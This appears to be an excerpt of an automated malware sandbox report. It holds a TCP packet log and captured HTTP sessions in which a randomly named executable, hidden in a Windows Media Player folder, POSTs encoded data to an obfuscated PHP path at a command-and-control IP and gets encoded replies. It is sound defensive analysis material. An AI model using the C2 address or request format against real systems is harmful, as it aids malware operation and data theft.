                                                                                        Jan 8, 2025 18:09:30.418586016 CET8050061185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.468031883 CET5006180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.545829058 CET5006180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.546101093 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.550738096 CET8050061185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.550817966 CET5006180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.550885916 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.550976992 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.551202059 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.555937052 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.767363071 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.772178888 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.772319078 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.772617102 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.777451992 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.905896902 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:30.911377907 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.911391020 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:30.911408901 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.124538898 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.129328012 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.129441977 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.237360954 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.280534983 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.373687029 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.421196938 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.455406904 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.499310017 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.529323101 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.529565096 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.534440041 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.534454107 CET8050062185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.534537077 CET5006280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.534578085 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.534713984 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.539484024 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.590358019 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.639906883 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.890327930 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:31.896070957 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.896106958 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:31.896116972 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.216546059 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.264915943 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.354458094 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.405553102 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.488409996 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.488496065 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.488734007 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.493376970 CET8050063185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.493460894 CET5006380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.493498087 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.493561029 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.493668079 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.493681908 CET8050064185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.493727922 CET5006480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.498462915 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.843327999 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:32.848362923 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.848371983 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:32.848378897 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.177985907 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.233870983 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.310381889 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.358658075 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.464626074 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.464899063 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.469741106 CET8050065185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.469753981 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.469837904 CET5006580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.469894886 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.469961882 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.474786043 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.913532972 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:33.918421030 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.918432951 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:33.918442965 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.152874947 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.202554941 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.302120924 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.343040943 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.449651957 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.449795961 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.454585075 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.454603910 CET8050066185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.454664946 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.454694033 CET5006680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.454812050 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.459579945 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.812110901 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:34.816955090 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.816981077 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:34.816992998 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.147608042 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.202440023 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.278747082 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.327508926 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.407035112 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.407192945 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.412010908 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.412019968 CET8050067185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.412080050 CET5006780192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.412249088 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.412249088 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.417083025 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.765232086 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:35.770121098 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.770132065 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:35.770142078 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.128748894 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.171282053 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.263461113 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.311769962 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.386732101 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.387116909 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.391702890 CET8050068185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.391777039 CET5006880192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.391877890 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.391947985 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.392029047 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.396781921 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.595292091 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.600157976 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.600239992 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.600409031 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.605210066 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.761734009 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.767532110 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.767550945 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.767574072 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.952779055 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:36.958663940 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:36.958822012 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.084903955 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.140005112 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.218744040 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.265000105 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.286712885 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.327486992 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.417747974 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.425110102 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.425204039 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.429955006 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.430141926 CET8050069185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.430191994 CET5006980192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.636231899 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.636491060 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.641408920 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.641418934 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.641429901 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.850400925 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:37.905662060 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.998218060 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:37.998483896 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.003405094 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.003448009 CET8050070185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.003506899 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.003540039 CET5007080192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.003626108 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.008421898 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.359042883 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.363939047 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.363953114 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.363960981 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.673007965 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.718122005 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.806103945 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.858709097 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.937319040 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.937625885 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.942485094 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.942557096 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.942651987 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.942791939 CET8050071185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:38.942841053 CET5007180192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:38.947443962 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.296359062 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.301357985 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.301374912 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.301383018 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.617698908 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.671180010 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.747412920 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.796299934 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.871349096 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.871665955 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.876493931 CET8050072185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.876507044 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:39.876563072 CET5007280192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.876600027 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.876724005 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:39.881477118 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.233989954 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.241126060 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.241138935 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.241147995 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.566942930 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.608678102 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.698646069 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.749309063 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.850022078 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.850281954 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.855012894 CET8050073185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.855135918 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:40.855209112 CET5007380192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.855262041 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.855360985 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:40.860157013 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.202729940 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.207681894 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.207699060 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.207709074 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.639919996 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.664629936 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.664729118 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.795104980 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.795486927 CET5007580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.800172091 CET8050074185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.800241947 CET5007480192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.800282001 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:41.800348043 CET5007580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.800441027 CET5007580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:41.805222988 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.156336069 CET5007580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:42.161236048 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.161248922 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.161258936 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.422188044 CET5007680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:42.427089930 CET8050076185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.427301884 CET5007680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:42.427438974 CET5007680192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:42.432256937 CET8050076185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.483062029 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.530544996 CET5007580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:42.614383936 CET8050075185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:42.655529976 CET5007580192.168.2.4185.177.239.66
                                                                                        Jan 8, 2025 18:09:43.116763115 CET8050076185.177.239.66192.168.2.4
                                                                                        Jan 8, 2025 18:09:43.171159029 CET5007680192.168.2.4185.177.239.66

                                                                                        HTTP Request Dependency Graph

                                                                                        • 185.177.239.66

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449955185.177.239.66808496C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:08:34.701864004 CET598OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 344
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        Jan 8, 2025 18:08:35.341459036 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:35.453578949 CET344OUTData Raw: 00 01 01 01 03 0f 04 00 05 06 02 01 02 07 01 03 00 07 05 0f 02 04 03 0a 03 03 0f 04 04 50 03 57 0d 00 07 59 07 00 04 0b 0d 05 06 05 07 04 05 56 07 04 0e 5d 0d 50 01 01 01 0e 05 0d 07 00 07 08 03 02 0a 0b 05 04 04 06 0d 0e 0d 06 0d 54 0f 02 04 0c
                                                                                        Data Ascii: PWYV]PT^_WQV\L~A~pvc\iweRhBeL`o|Bhc]XoRczpr}l`^t~e~V@Ax}f}ry
                                                                                        Jan 8, 2025 18:08:35.782965899 CET1236INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:08:35 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 35 36 34 0d 0a 56 4a 7e 4d 7b 54 6b 06 7b 71 64 03 7f 71 51 44 7d 77 6f 42 6b 73 62 52 79 60 68 4f 6a 62 52 03 76 60 66 50 7b 71 75 4a 77 65 74 4a 69 5b 78 01 55 4b 71 0c 60 5c 5e 5a 6b 4c 5b 04 7c 77 71 51 78 58 52 0a 7d 05 63 04 75 72 79 03 77 5f 69 47 68 4f 7a 00 7d 7c 67 54 6a 5e 7f 49 77 66 7b 06 7c 5c 7a 59 7e 60 69 03 6c 77 77 58 78 77 74 42 6c 6d 6b 49 79 4c 51 59 78 5a 62 06 6b 59 70 00 78 49 78 07 7c 71 7f 40 61 5f 63 5b 7a 51 41 5b 7d 67 59 53 68 5f 71 4e 61 6f 68 07 78 7f 68 04 76 63 62 4e 6e 72 66 5d 69 7c 76 05 7a 61 6a 05 76 73 6c 59 75 71 73 5c 63 62 72 50 7e 5d 7a 06 77 4c 6d 01 76 65 68 09 68 6c 65 01 77 7c 73 5d 7f 5d 6f 5b 78 6c 5d 03 6f 70 65 5b 7c 6d 74 08 74 67 6c 04 7e 62 5b 50 7e 7e 78 51 6f 7d 6e 4c 7e 72 7d 06 7b 5d 46 51 7c 0a 73 54 7e 60 73 55 7e 67 61 5f 7b 6e 6b 01 78 5c 64 01 7c 5f 77 02 6a 49 5e 50 7f 70 65 0d 7a 4d 5d 5d 6a 62 70 49 63 5d 75 51 7b 5c 79 00 77 76 5a 01 7e 48 7c 4e 7e 58 5b 0a 74 5c 63 4a 7c 72 53 07 7c 59 54 40 78 76 60 4f 7d 5d 77 4a 75 72 6d 07 77 [TRUNCATED]
                                                                                        Data Ascii: 564VJ~M{Tk{qdqQD}woBksbRy`hOjbRv`fP{quJwetJi[xUKq`\^ZkL[|wqQxXR}curyw_iGhOz}|gTj^Iwf{|\zY~`ilwwXxwtBlmkIyLQYxZbkYpxIx|q@a_c[zQA[}gYSh_qNaohxhvcbNnrf]i|vzajvslYuqs\cbrP~]zwLmvehhlew|s]]o[xl]ope[|mttgl~b[P~~xQo}nL~r}{]FQ|sT~`sU~ga_{nkx\d|_wjI^PpezM]]jbpIc]uQ{\ywvZ~H|N~X[t\cJ|rS|YT@xv`O}]wJurmwaS~aT|`}IsvOkJ{LS}pqygZygxO{Sgz\xHxsrO|NhxI|D}bwvOp~R|gVOOmuRRxlRwNTz_m}lvLzaTu]ovORAvan`Twb}ueR||SMv|t|sly|g{^TIC^NtwxL}Lz}moA{SzN}L[|ptBpA`p~wr{SQybZ~qUI}Yg@~`iBy]^L~\VtM}@yaaKuvZ~Xt@}vawrKbaM|Yb{f|A}cwvbyLtaq|_v}|dNwsvqU{LyJ|`[xw`xghx}z\tHx]v{]NZxYgY}L]aOoY||cH}g`|nUb|Axo|wNPNn_z]jU~_z\y\}b`g{ZL~Jx^Twbmvep|RW`th]{Yy|gosuX|}oPtIZj\zzSYQV~ERpr_kETVp{@RTPy`oaxln{gSX^ik|BhcGQxtpjrlFcZa{q}uuc^}f`vuc\Qbr^|wuQ{H]Q}^{]OrXcbGS}e_Qo_S^dK\bdJQuqz^_Fxw`A{gpOzSwxe|B|ZSZP{@RdQCQZ]YmgzRY[f^g{sXO[UJ_y{{_ccNV}b^RoPVXe_Y`Fq_Z_mXaxr_AZ[K\trsVkoB[po[P`UUU`\TcFcRc`py]bzPAQoa [TRUNCATED]
                                                                                        Jan 8, 2025 18:08:35.782985926 CET342INData Raw: 4d 79 4b 7d 5a 5d 59 52 05 77 42 5d 60 54 48 56 59 09 59 5a 01 67 47 57 7a 7b 02 61 00 01 53 63 65 7b 05 7b 5a 66 61 7b 5a 44 50 6c 00 6f 4e 50 70 4a 01 62 04 54 43 61 07 76 46 55 62 06 01 53 56 59 76 69 64 03 5f 71 5f 5d 59 63 61 0d 40 57 73 6e
                                                                                        Data Ascii: MyK}Z]YRwB]`THVYYZgGWz{aSce{{Zfa{ZDPloNPpJbTCavFUbSVYvid_q_]Yca@WsnXuwokkYU@{B~[Q]WuEVc]CT_YQYb\QVdvPcT{_[PlS|_y{{_ccNV}b^RoPlD\pZFbbmXqMkgzp]C[_kWx}vAc`sEh|Zz{|\ocDPqoWXdPRqqRado~b__ywlpCy]FQiaBV~J
                                                                                        Jan 8, 2025 18:08:37.079519987 CET574OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 384
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:08:37.291210890 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:08:37.291423082 CET384OUTData Raw: 5c 5d 43 5e 5b 59 57 5f 5e 5c 50 55 50 5c 5a 58 5a 5d 5b 5d 54 52 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
